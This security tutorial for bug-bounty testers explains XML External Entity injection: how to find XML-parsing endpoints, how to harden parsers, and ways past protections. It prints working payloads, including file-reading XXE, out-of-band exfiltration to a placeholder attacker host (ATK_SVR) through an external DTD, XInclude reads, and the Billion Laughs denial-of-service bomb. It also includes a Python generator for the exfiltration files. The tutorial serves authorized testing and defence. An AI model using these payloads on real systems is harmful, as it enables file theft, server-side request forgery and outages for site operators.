&XMLol;

Even if it doesn’t get a billion LOLs, this week’s article dives into a real classic. XML External Entity attacks are a historic vulnerability that continues to impact modern applications. We’ll be covering how to identify them in the wild, common protections, and even bypasses to said protections!

What is XML Injection?

Occurring when user input is inserted into a server-side XML document, XML injection (XMLi) relies on modifying the structure of the document it’s inserted into so that it performs unauthorized actions on behalf of an adversary. As this occurs server-side, the vulnerability can achieve a wide variety of effects, including data exfiltration, server-side request forgery (SSRF), and even denial of service (DoS).

Core Components:

While I normally try to avoid including base definitions in these articles, I do want to highlight the following components of an XML document, as they’ll be the cornerstone of crafting our exploits.

Document Type Definitions:

To draw a comparison to programming, a document type definition (DTD) is similar to a header file. Containing declarations of elements, attributes, and entities, the DTD is used to define the structure and content of an XML document. These DTDs can then be applied to a document in two main ways, inline and external.

An inline DTD is declared in the XML document in which it is applied. Typically, in the following fashion:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example [
  <!ELEMENT Example (Message)>
  <!ELEMENT Message (#PCDATA)>
]>
<Example>
  <Message>Eru Was Here!</Message>
</Example>

An external DTD, on the other hand, is declared in an external .dtd file and is included into the XML document similar to how a header is used. Our DTD file would look like this:

  <!ELEMENT Example (Message)>
  <!ELEMENT Message (#PCDATA)>

The XML file that references it would then become the following:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example SYSTEM "Example.dtd">
<Example>
  <Message>Eru Was Here!</Message>
</Example>

External Entities:

Continuing with our programming analogy, entities are comparable to variables, and external entities specifically are entities that reference an external resource, i.e. a file or a URL. These external entities allow us to include content outside of the XML document itself and are used in the following manner:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example [
  <!ENTITY external_entity SYSTEM "file:///etc/hosts">
]>
<Example>
  &external_entity;
</Example>
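
To make the variable analogy concrete, here is a minimal Python sketch using the standard library's xml.etree.ElementTree. It deliberately uses an internal entity (a plain string value) rather than an external one so that it touches no files, and the entity name greeting is made up for illustration.

```python
import xml.etree.ElementTree as ET

# An internal entity behaves like a named constant: it is declared once in
# the DTD and substituted wherever it is referenced in the document body.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE Example [
  <!ENTITY greeting "Eru Was Here!">
]>
<Example>&greeting;</Example>"""


def expand_entities(document: str) -> str:
    """Parse the document and return the root element's text after expansion."""
    root = ET.fromstring(document)
    return root.text


print(expand_entities(DOCUMENT))
```

An external entity is declared the same way, only with SYSTEM and a file path or URL in place of the quoted value.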

Classic XXE:

At their core, XML external entities (XXEs) are a feature of XML documents. They’re used to increase ease of programming, modularity, and readability. That said, they’re also a key target for adversaries as they have the ability to leak confidential information, create requests on the server’s behalf, and can even bring down the application entirely if not secured properly. Traditional XXE attacks are aimed at injecting external entities into server-side XML, with the results being directly returned as a part of the resulting document.

Blind XXE:

When the resulting XML document is not included in the HTTP response, adversaries must find other ways to extract this information. Most often, this will take the form of out-of-band attacks where an adversary will have the server append sensitive information to requests addressed to a server they control and can view at their leisure. It is important to note that there are several more constraints that can prevent a blind XXE, with options such as limiting outbound network traffic being the most straightforward.


Finding XMLi:

Identify Endpoints:

Our first step in identifying XMLi will be to identify where in the application XML data is allowed and is processed by an XML parser on the server. Typical functionality to investigate includes internal data transfers, file uploads, and endpoints expecting JSON or text objects.

Data Transfers:

XML is often used when moving data internally in an application. As a result, we should keep an eye out for HTTP messages containing XML data and test them for injection when found. It's worth remembering that a common technique for transferring data in HTTP messages is to base64 encode it, so we should decode suspicious values and check thoroughly when looking for endpoints.
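
As a rough illustration of that check, the following Python sketch decodes a candidate parameter value and reports whether it looks like XML. The function name and the "starts with <" heuristic are assumptions for this example, not a complete detector.

```python
import base64
import binascii
from typing import Optional


def decode_if_base64_xml(value: str) -> Optional[str]:
    """Return the decoded text if `value` is base64 that decodes to XML-looking data."""
    try:
        # validate=True rejects characters outside the base64 alphabet
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    # Crude heuristic: XML documents start with "<" once whitespace is stripped
    return text if text.lstrip().startswith("<") else None
```

Any value for which this returns text is worth replaying with a modified, re-encoded XML body.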

File Uploads:

We should also be mindful of endpoints that allow for file uploads. Even if the endpoint is not directly asking for an XML document, several file formats support XML and may provide us the opportunity to find an injection point. Commonly vulnerable file types include:

  • SVG: An image format comprised of XML formatted data.
  • DOCX, PPTX, XLSX: Microsoft Office files can be unarchived to expose the composite files that make up the finished document. Several of these files are already XML formatted, and we can then insert our malicious payloads into them directly before re-archiving the files back to their original extension.
  • PDF: XML data can be embedded within PDFs. XXE payloads can be included in sections such as annotations and comments, which can be stored as XML alongside the PDF.
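
For the Office formats in particular, the unarchive, edit, and re-archive steps can be sketched in Python with the standard zipfile module. The helper names below are hypothetical, and the sketch works on bytes in memory rather than on a real document.

```python
import io
import zipfile


def list_xml_parts(archive_bytes: bytes) -> list[str]:
    """List the XML files inside a zip-based document such as a DOCX."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        return sorted(name for name in archive.namelist() if name.endswith(".xml"))


def replace_part(archive_bytes: bytes, part_name: str, new_content: bytes) -> bytes:
    """Return a copy of the archive with one part swapped for new content."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            # Copy every part unchanged except the one we are replacing
            data = new_content if item.filename == part_name else src.read(item.filename)
            dst.writestr(item.filename, data)
    return out.getvalue()
```

Writing the returned bytes back out with the original extension gives a file that can be uploaded to the endpoint under test.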

JSON Downgrading:

If the application is expecting user input to be formatted as a JSON object, we can try providing XML instead by converting the JSON object structure to an XML structure. Then, by altering the Content-Type header to one of the following:

Content-Type: text/xml
Content-Type: application/xml

We can check to see if the application parses the provided XML anyways, regardless of what it was expecting. If so, the endpoint might be vulnerable to XML injection. This same mentality can be applied if the endpoint is natively allowing for a Content-Type: text/plain.
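
The conversion step can be sketched in Python as follows. The root element name and the item tag used for list entries are assumptions, since the real mapping depends on whatever library the target uses to bind XML to its objects, and JSON keys are assumed to be valid XML element names.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(json_text: str, root_name: str = "root") -> str:
    """Convert a JSON document into a simple element-per-key XML string."""

    def build(parent: ET.Element, value) -> None:
        if isinstance(value, dict):
            for key, child in value.items():
                build(ET.SubElement(parent, key), child)
        elif isinstance(value, list):
            for child in value:
                build(ET.SubElement(parent, "item"), child)
        else:
            parent.text = "" if value is None else str(value)

    root = ET.Element(root_name)
    build(root, json.loads(json_text))
    return ET.tostring(root, encoding="unicode")


print(json_to_xml('{"user": "eru", "id": 7}'))
```

The resulting string becomes the request body, sent with one of the XML Content-Type headers shown above.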

Testing for Classic XXE:

After identifying endpoints within the application that will accept XML data, our next step will be to test for the ability to include external entities. It's important to remember that just allowing for XML data is not a vulnerability; we must be able to show impact. To that end, our goal will be to demonstrate an XXE. A simple XXE payload is as follows:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example[
  <!ENTITY xxe SYSTEM "file:///etc/hosts">
]>
<Example>&xxe;</Example>

Testing for Blind XXE:

If we believe we've found an endpoint that is parsing our provided XML data, but it doesn't return anything to us in the HTTP response, we can instead test for a blind XXE. Using out-of-band testing, we can force the application to make a request to a server we control. If we then see the traffic in our server's logs, we can confirm that the vulnerability does exist. A simple proof of concept would be the following:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example[
  <!ENTITY xxe SYSTEM "http://ATK_SVR:80/example.txt">
]>
<Example>&xxe;</Example>

That said, a meaningful blind XXE is much harder to demonstrate. If we want to leverage this vulnerability to confirm information disclosure, we'll have to rely on the XML parser allowing at least the following:

  • Outbound Network Requests
  • External DTDs
  • Parameter Entities
  • Excessive Internal Permissions

If any of these are disabled or missing, we might not be able to create a meaningful exploit against the endpoint.
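
On our side, the out-of-band check needs nothing more than a server that records incoming requests. The following is a minimal sketch using Python's standard http.server module; the names received, CallbackHandler, and start_listener are made up for this example, and it binds to localhost by default so it can be tried safely.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

# (client_ip, path, decoded_query) for every callback seen
received = []


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        parts = urlsplit(self.path)
        received.append((self.client_address[0], parts.path, unquote(parts.query)))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format, *args):
        pass  # silence the default stderr logging; `received` is our record


def start_listener(host: str = "127.0.0.1", port: int = 0) -> HTTPServer:
    """Start the listener in a background thread (port 0 picks a free port)."""
    server = HTTPServer((host, port), CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

In a real test the listener would bind to an address the target can reach. Any entry that shows up in received after submitting the payload confirms the parser made the outbound request.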


Preventing XXE Attacks:

The core of preventing XML injection will be in limiting the capabilities of our XML parser. By restricting the parser to only the capabilities and access needed for its intended functionality, we're able to lower the impact of any potential injection found.

Knowing your Parser:

By default, XML parsers are quite privileged. Lowering these default settings is the most straightforward method of preventing an attack.

Things to Disable:

Several of the default settings can be outright disabled, or at least limited, when not necessary for intended functionality. The following are only some of the most common options:

  • DTD Processing
  • Inline DTDs
  • Entity Expansion
  • External Entities
  • Parameter Entities
  • Outbound Network Requests
  • Parse-Time
  • Parse-Depth (recursion)

As with most security best practices, if a functionality isn’t needed, don’t include it!
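
As one example of the first item, DTD processing can be refused outright. The sketch below does this in Python with the standard library by rejecting any document that declares a DOCTYPE before it is parsed. The names DTDForbidden and parse_untrusted are hypothetical, and other languages and parsers expose this as a configuration option instead; third-party packages such as defusedxml offer a similar check for Python.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when a document declares a DOCTYPE."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DTDForbidden(f"DOCTYPE declarations are not allowed (root: {name})")


def parse_untrusted(data: bytes) -> ET.Element:
    # First pass: walk the document with expat and abort on any DOCTYPE.
    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)
    # Second pass: with no DTD present there are no custom entities to expand.
    return ET.fromstring(data)
```

Because entities can only be declared inside a DTD, refusing the DOCTYPE removes external entities, parameter entities, and entity expansion in one step.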

Permissions:

Another point to remember is that you can limit what the parser has access to. By restricting its ability to interact with system files or anything beyond what is strictly necessary, we're able to largely mitigate a vulnerability's impact.

Input Sanitization:

Beyond restricting the parser, defense-in-depth would have us ensure that sufficient input validation is also in place. Properly escaping special characters that are essential to XML syntax may even fully stop a potential vulnerability. Further, restrict any file upload to only the expected file type, and ensure any file that could include XML data is either not processed or is sanitized before being processed by the server.
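
A minimal Python sketch of the escaping step, assuming user input is placed into element content (not an attribute) and reusing the Example and Message element names from earlier in this article:

```python
from xml.sax.saxutils import escape


def build_message(user_text: str) -> str:
    """Embed user input as text so it cannot open tags or entity references."""
    # escape() replaces &, <, and > with their entity equivalents
    return f"<Example><Message>{escape(user_text)}</Message></Example>"


print(build_message("<xi:include/>&xxe;"))
```

Input placed into an attribute value would also need its quote characters escaped.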

Update Often:

XML injection vulnerabilities may also be introduced due to external dependencies. By maintaining a healthy update schedule, we can limit the possibility for known exploits to impact our application.


Bypassing XMLi Protections:

When considering the protections put in place to prevent an XXE attack, there is little we can do to work around an option that is outright disabled. That said, creativity can easily be the difference between reporting a critical and having no bug at all.

XInclude:

If we’re unable to find an endpoint in which we can submit an XML document that we control, but we strongly suspect the server to be vulnerable to XXE, we can instead attempt to use an XInclude. XInclude is a feature that, when included in the body of an XML document, acts much like an external entity by pulling outside content into the document. This functions similarly to a second-order injection, in that the content by itself doesn’t result in exploitation; rather, later parsing by the server is our intended target.

In the following example, let’s assume that the content found within the <Message> element was user provided at an earlier juncture and has since been incorporated into this XML document for rendering:

<?xml version="1.0" encoding="UTF-8"?>
<Example>
  <Message>
    <xi:include parse="text" href="file:///etc/hosts" xmlns:xi="http://www.w3.org/2001/XInclude"/>
  </Message>
</Example>

If done properly, the contents of our message will instead contain the contents of /etc/hosts.
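
To see what happens on the server side, here is a small Python sketch of an application that runs XInclude processing over a stored document, using the standard library's xml.etree.ElementInclude. The fake_loader function and its canned file contents are assumptions that stand in for a real file read, so the sketch touches nothing on disk.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

# Canned content standing in for the server's real filesystem
FAKE_FILES = {"file:///etc/hosts": "127.0.0.1 localhost\n"}


def fake_loader(href, parse, encoding=None):
    """Stand-in for the default loader, which would open the href for real."""
    if parse != "text":
        raise ValueError("this sketch only handles parse='text'")
    return FAKE_FILES[href]


DOCUMENT = """<Example>
  <Message><xi:include parse="text" href="file:///etc/hosts"
      xmlns:xi="http://www.w3.org/2001/XInclude"/></Message>
</Example>"""


def render(document: str) -> str:
    root = ET.fromstring(document)
    # The include element is replaced by whatever the loader returns
    ElementInclude.include(root, loader=fake_loader)
    return root.find("Message").text


print(render(DOCUMENT))
```

Note that no DOCTYPE is involved at any point, which is why XInclude can still work when DTDs are refused.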

Blind Exfiltration:

Assuming the HTTP response does not contain the resulting XML document, we’re left with the option to test for blind XXE. As this will largely rely on out-of-band testing, we’ll need to establish a method of viewing the information we’re attempting to disclose.

Parameter Entities:

While our minds might lean towards the external entities we’ve covered so far, the reality is that the resulting XXE structure wouldn’t work in most cases. Let’s look at the following example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example[
  <!ENTITY target_file SYSTEM "file:///etc/hosts">
  <!ENTITY xxe SYSTEM "http://ATK_SVR:80/?&target_file;">
]>
<Example>
&xxe;
</Example>

The reason this fails is our second ENTITY, “xxe”. General entity references such as &target_file; are not expanded inside another entity’s declaration, so the parser never substitutes the file’s contents into the URL. This effectively prevents us from building a payload for our blind XXE.

Instead, we can rely on another feature of the DTD, parameter entities. Declared, and only usable, within the DTD, parameter entities are used to define a set of values that are used to construct a larger XML document. Declared similarly to an external entity with the ENTITY keyword, the key distinction with a parameter entity will be the % in its declaration, such as:

<!ENTITY % target_file SYSTEM "file:///etc/hosts">

Unlike external entities, parameter entities can be embedded within one another, and can be used to fix our previous example. Let’s review the following:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example[
  <!ENTITY % target_file SYSTEM "file:///etc/hosts">
  <!ENTITY % xxe "<!ENTITY &#x25; run SYSTEM 'http://ATK_SVR:80/?%target_file;'>">
  %xxe;
  %run;
]>
<Example/>

Similar to our initial example, we’ll construct an entity aimed at the file we wish to extract. The core differences arise in our second entity, “xxe”. Here, our parameter entity is declared as the string <!ENTITY &#x25; run SYSTEM 'http://ATK_SVR:80/?%target_file;'>. In this string, we are declaring a third parameter entity, “run”, that then contains our payload to exfiltrate /etc/hosts from the target. The &#x25; is simply an encoded %, needed because a literal % inside an entity value would be read as the start of a parameter entity reference.

This is done because “target_file” will only resolve at execution. Meaning, we will rely on “xxe” to create the payload where “run” contains the contents of “target_file”, not just a reference to another parameter. Once the “xxe” parameter call is executed, “run” is built. We then call “run” to reach externally to the server we control, where we can view the appended contents of “target_file” in our server logs.

While that’s tricky enough, it still may not be enough to get past the XML parser. The XML specification does not allow parameter entity references inside markup declarations in an inline DTD, and conforming parsers enforce this, seemingly undermining what we’ve achieved so far. Or does it? The restriction doesn’t apply to external DTDs, so if we host the declarations in a .dtd file on our controlled server, we can split the previous example across two files: a .dtd and our XML payload. First, let’s look at the .dtd:

<!ENTITY % target_file SYSTEM "file:///etc/hosts">
<!ENTITY % xxe "<!ENTITY &#x25; run SYSTEM 'http://ATK_SVR:80/?%target_file;'>">
%xxe;
%run;

We would then call this external DTD with the following XML payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example[
  <!ENTITY % dtd SYSTEM "http://ATK_SVR/example.dtd">
  %dtd;
]>
<Example/>
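
Since both files need to agree on the attacker host and the entity names, it can help to generate them together. The following Python sketch does so. The function name is hypothetical, and the entity that loads the hosted file is named dtd here (an assumption) so that it does not collide with the xxe entity declared inside that file, because when an entity is declared twice only the first declaration counts.

```python
def build_oob_payloads(attacker_host: str, target_uri: str, dtd_name: str = "example.dtd"):
    """Return (dtd_text, xml_text) for an out-of-band exfiltration attempt."""
    # Hosted on the attacker's server: reads the file, then builds and
    # triggers the request that carries its contents in the query string.
    dtd_text = (
        f'<!ENTITY % target_file SYSTEM "{target_uri}">\n'
        f"<!ENTITY % xxe \"<!ENTITY &#x25; run SYSTEM 'http://{attacker_host}/?%target_file;'>\">\n"
        "%xxe;\n"
        "%run;\n"
    )
    # Submitted to the target: only pulls in the hosted DTD.
    xml_text = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE Example [\n"
        f'  <!ENTITY % dtd SYSTEM "http://{attacker_host}/{dtd_name}">\n'
        "  %dtd;\n"
        "]>\n"
        "<Example/>\n"
    )
    return dtd_text, xml_text
```

Calling build_oob_payloads("ATK_SVR:80", "file:///etc/hosts") yields the pair of files described above, ready to be hosted and submitted respectively.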

Escalating XMLi:

While we’ve extensively covered the fact that XMLi can be used to exfiltrate confidential information, it can also be used as an avenue for other attack vectors, the most common being SSRF and DoS.

Server Side Request Forgery:

Because our injected XXE can force a server to make outbound requests on our behalf, we can begin to explore everything the application has access to. By controlling server requests, we can attempt to enumerate internal services, expanding our understanding of the attack surface even further, and serving as a launching point for further exploitation. If you haven’t taken the time to check out An SSRFing Mess, I would highly recommend it for a fuller explanation of what’s possible with this attack vector.

Denial of Service:

Another common use case of XXE is to conduct a DoS attack, with the most famous example being the Billion Laughs attack, also referred to as an XML bomb. It gives an attacker the opportunity to completely deny access to the application via a relatively small payload. This is possible because XML parsers allow entities to be nested within one another, with the Wikipedia example of this attack being the following:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Each level of entity, from “lol1” to “lol9”, contains 10 copies of the level before it. When expanded, level n holds 10^n copies of “lol”, meaning the 3-byte “lol” expands to a 30-byte payload at the end of “lol1”, a 300-byte payload at the end of “lol2”, and a 3-gigabyte payload at the end of “lol9”. With one more layer, that becomes 30 gigabytes. I’m sure you can imagine the severity of this nesting being allowed.
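
The arithmetic is easy to check with a few lines of Python. The function name and its defaults are just for illustration.

```python
def expanded_size(levels: int, fanout: int = 10, base: str = "lol") -> int:
    """Bytes produced when the entity at the given level is fully expanded."""
    return len(base.encode("utf-8")) * fanout ** levels


for level in (1, 2, 9, 10):
    print(f"lol{level}: {expanded_size(level):,} bytes")
```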

Is it in Scope?

It’s critical to remember that in 99% of programs, denial of service testing will be considered out of scope. Always refer to your specific rules of engagement before conducting any testing of this nature, and if in doubt, contact your program (that’s what they’re there for!). If they’re okay with you testing further, simplifying the payload to at most 3 layers of recursion should be plenty, as it sufficiently demonstrates that XML parse depth is not enforced in the application.
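
A reduced payload of that kind can be generated rather than written by hand. The Python sketch below builds one with a configurable number of layers and, purely to confirm the math, expands it with the local standard-library parser instead of sending it anywhere. The function names are hypothetical.

```python
import xml.etree.ElementTree as ET


def build_nested_payload(levels: int = 3, fanout: int = 10) -> str:
    """Build a small nested-entity document in the style of Billion Laughs."""
    lines = ['<?xml version="1.0"?>', "<!DOCTYPE lolz [", '  <!ENTITY lol0 "lol">']
    for level in range(1, levels + 1):
        # Each level references the previous one `fanout` times
        refs = f"&lol{level - 1};" * fanout
        lines.append(f'  <!ENTITY lol{level} "{refs}">')
    lines += ["]>", f"<lolz>&lol{levels};</lolz>"]
    return "\n".join(lines)


def expanded_length(payload: str) -> int:
    """Parse locally and report how many characters the body expands to."""
    return len(ET.fromstring(payload).text)


print(expanded_length(build_nested_payload(3)))
```

With three layers the body expands to only a few kilobytes, which is enough to show the nesting is honored without putting the target at risk.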